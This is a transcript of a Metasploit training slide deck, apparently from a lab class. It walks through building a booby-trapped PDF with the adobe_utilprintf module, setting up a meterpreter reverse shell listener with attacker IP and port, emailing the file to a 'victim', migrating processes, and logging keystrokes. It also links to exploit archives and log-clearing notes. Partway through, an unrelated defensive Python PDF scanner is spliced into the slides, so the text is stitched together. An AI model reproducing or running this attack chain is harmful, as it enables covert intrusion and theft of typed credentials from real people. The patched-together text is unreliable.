METASPLOIT

METASPLOIT. WHAT IS METASPLOIT? Metasploit is a framework for creating exploits Written in Ruby Created originally by HD Moore Many Developers Worldwide.

Jan 15, 2016

Transcript
Page 1

METASPLOIT

Page 2

WHAT IS METASPLOIT?

• Metasploit is a framework for creating exploits
• Written in Ruby
• Created originally by HD Moore
• Many developers worldwide
• Commercial version available from Rapid7

Contributors: HD Moore, James Lee, Joshua J. Drake, Mike Smith, Tod Beardsley, Jon Cran, MC, Ramon Valle, Patrick Webster, Efrain Torres, Stephen Fewer, Lurene Grenier, Steve Tornio, Nathan Keltner, I)ruid, Chris Gates, Kris Katterjohn, Carlos Perez

Page 3

Metasploit Pro

Page 4

TODAY'S OBJECTIVES

• Create a malicious PDF file
• Have a user (victim) open that file
• Change process ID so we have continued access to the victim
• Gather info from the victim via a keylogger

Page 5

BASIC STEPS

The basic format for exploiting a system:

1. Pick which exploit to use
2. Configure the exploit
3. Pick a payload
4. Configure the payload
5. Execute the exploit

Page 6

STARTING METASPLOIT

• Open a terminal session
• Make sure you are in the right directory
• Type “sudo msfconsole” at the command line
• Updating Metasploit
• On the Windows platform, launch the Metasploit Update.
• On Linux simply enter msfupdate as root

Page 7

STARTING METASPLOIT cont.

Got cow?

Page 8

CORE COMMANDS

We will be using a limited command set in our lab today. Here are all the possible commands we could use.

• ? Help menu
• back Move back from the current context
• banner Display an awesome metasploit banner
• cd Change the current working directory
• color Toggle color
• connect Communicate with a host
• exit Exit the console
• help Help menu
• info Displays information about one or more modules
• irb Drop into irb scripting mode
• jobs Displays and manages jobs
• kill Kill a job
• load Load a framework plugin

Page 9

CORE COMMANDS (cont.)

• loadpath Searches for and loads modules from a path
• quit Exit the console
• resource Run the commands stored in a file
• route Route traffic through a session
• save Saves the active datastores
• search Searches module names and descriptions
• sessions Dump session listings and display information about sessions
• set Sets a variable to a value
• setg Sets a global variable to a value
• show Displays modules of a given type, or all modules
• sleep Do nothing for the specified number of seconds
• unload Unload a framework plugin
• unset Unsets one or more variables
• unsetg Unsets one or more global variables
• use Selects a module by name
• version Show the framework and console library version numbers

Page 10

CREATE MALICIOUS PDF

• Create PDF
• Include Meterpreter payload
• Email malicious PDF to victim

Page 11

CREATING PDF

uopadmin@Attacker1:~# sudo msfconsole
msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) >

Page 12

CREATING PDF cont.

Page 13

CREATING PDF cont.

msf exploit(adobe_utilprintf) > info
msf exploit(adobe_utilprintf) > set OUTPUTPATH ~
OUTPUTPATH => ~
msf exploit(adobe_utilprintf) > set filename help.pdf
filename => help.pdf
msf exploit(adobe_utilprintf) > show payloads
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.0.x
LHOST => 192.168.0.x
msf exploit(adobe_utilprintf) > set LPORT 80
LPORT => 80
msf exploit(adobe_utilprintf) > exploit
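The defensive counterpart to the slide above, added here as an example and not part of the slides or of the Metasploit project: the adobe_utilprintf module is named after Adobe Reader's util.printf() JavaScript function, so a mail-gateway or triage check can flag PDFs that carry a JavaScript action referencing it. The scanner, its indicator names and the sample PDFs below are all constructed for this example; it resolves hex-escaped name tokens (/J#61vaScript) and inflates Flate-compressed streams, two things a plain string search on the file would miss.

```python
"""Flag PDFs whose JavaScript action references util.printf (added example)."""
import re
import zlib

# 'stream' keyword that is not the tail of 'endstream', then the body.
_STREAM = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.S)
# PDF name tokens may hex-escape characters: /J#61vaScript == /JavaScript.
_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def inflate_streams(data: bytes) -> bytes:
    """Append the inflated body of every zlib-compressed stream to the data."""
    clear = []
    for m in _STREAM.finditer(data):
        try:
            clear.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue  # not Flate-encoded (or corrupt): raw bytes are scanned anyway
    return data + b"\n" + b"\n".join(clear)


def normalise_names(data: bytes) -> bytes:
    """Resolve #xx escapes so obfuscated name tokens match the plain regexes."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data: bytes) -> dict:
    """Return the indicators found in the PDF plus a coarse verdict."""
    text = normalise_names(inflate_streams(data))
    result = {
        "javascript": re.search(rb"/(JavaScript|JS)\b", text) is not None,
        "open_action": re.search(rb"/(OpenAction|AA)\b", text) is not None,
        "util_printf": re.search(rb"util\s*\.\s*printf\s*\(", text) is not None,
    }
    if result["javascript"] and result["util_printf"]:
        result["verdict"] = "suspicious: JavaScript action referencing util.printf"
    elif result["javascript"]:
        result["verdict"] = "review: document contains JavaScript"
    else:
        result["verdict"] = "no JavaScript indicators"
    return result


def build_sample(js=None, compress=False) -> bytes:
    """Construct a minimal PDF for the demo; js=None yields one with no action."""
    catalog = b"<< /Type /Catalog /Pages 2 0 R"
    if js is not None:
        catalog += b" /OpenAction 3 0 R"
    objs = [catalog + b" >>", b"<< /Type /Pages /Kids [] /Count 0 >>"]
    if js is not None:
        body = zlib.compress(js) if compress else js
        filt = b"/Filter /FlateDecode " if compress else b""
        objs.append(b"<< /S /J#61vaScript /JS 4 0 R >>")  # hex-escaped name token
        objs.append(b"<< " + filt + b"/Length " + str(len(body)).encode()
                    + b" >>\nstream\n" + body + b"\nendstream")
    out = b"%PDF-1.4\n"
    for num, obj in enumerate(objs, 1):
        out += str(num).encode() + b" 0 obj\n" + obj + b"\nendobj\n"
    return out + b"trailer << /Root 1 0 R >>\n%%EOF\n"


# Constructed samples: a benign document, and a JavaScript action calling
# util.printf stored once in clear and once Flate-compressed.
BENIGN_PDF = build_sample()
PRINTF_PDF = build_sample(b'app.alert(util.printf("%d", 7));')
PRINTF_FLATE_PDF = build_sample(b'app.alert(util.printf("%d", 7));', compress=True)

if __name__ == "__main__":
    for name, pdf in (("benign", BENIGN_PDF), ("printf", PRINTF_PDF),
                      ("printf+flate", PRINTF_FLATE_PDF)):
        print(f"{name:13s} {scan_pdf(pdf)['verdict']}")
```

This is a heuristic, not a parser: legitimate forms do call util.printf, and JavaScript that assembles the call from string fragments will not match, so treat a hit as a reason to detonate or inspect the document with a real PDF object parser rather than as a verdict on its own.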

Page 14

VICTIM RECEIVES FILE

• Victim opens file
• Exploit is launched
• Connection made back to badguy machine
• Begin using Meterpreter

Page 15

USING METERPRETER

• Changing process ID
• Installing a key logger remotely

Page 16

EXPLOITING

• msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=80 LHOST=192.168.0.201 E

Page 17

CHANGING PROCESS ID USING METERPRETER

• sysinfo: Show the system name and OS type
• ps: Show process IDs
• getpid: Show the process ID of meterpreter
• migrate: Migrate to another process ID

Page 18

INSTALL KEYLOGGER VIA METERPRETER

• keyscan_start: Start key logger
• keyscan_dump: Read key logger data

Page 19

USEFUL LINKS

• Main site: http://www.metasploit.com
• User Guide: http://www.metasploit.com/documents/users_guide.pdf
• Wiki: http://www.metasploit.com/redmine/projects/framework/wiki/Page_index
• Exploits and POCs: http://milw0rm.com/exploits/
• Metasploit PDF Exploit: http://carnal0wnage.blogspot.com/2008/11/metasploit-adobe-utilprintf-client-side.html
• VNC Word Macro Exploit: http://devilz-kiddies.blogspot.com/2009/09/metasploit-reverse-vnc-hidden-in-word.html
• Module Info: http://www.metasploit.com/modules/
• Clearing event logs: http://seclists.org/metasploit/2008/q4/153
• exe2vba: http://www.securiteam.com/tools/5KP0J2KFPQ.html
• exe2vba source: http://www.metasploit.com/redmine/projects/framework/repository/revisions/6708/entry/tools/exe2vba.rb

Page 20

CONTACT INFO

• [email protected] (that’s a zero)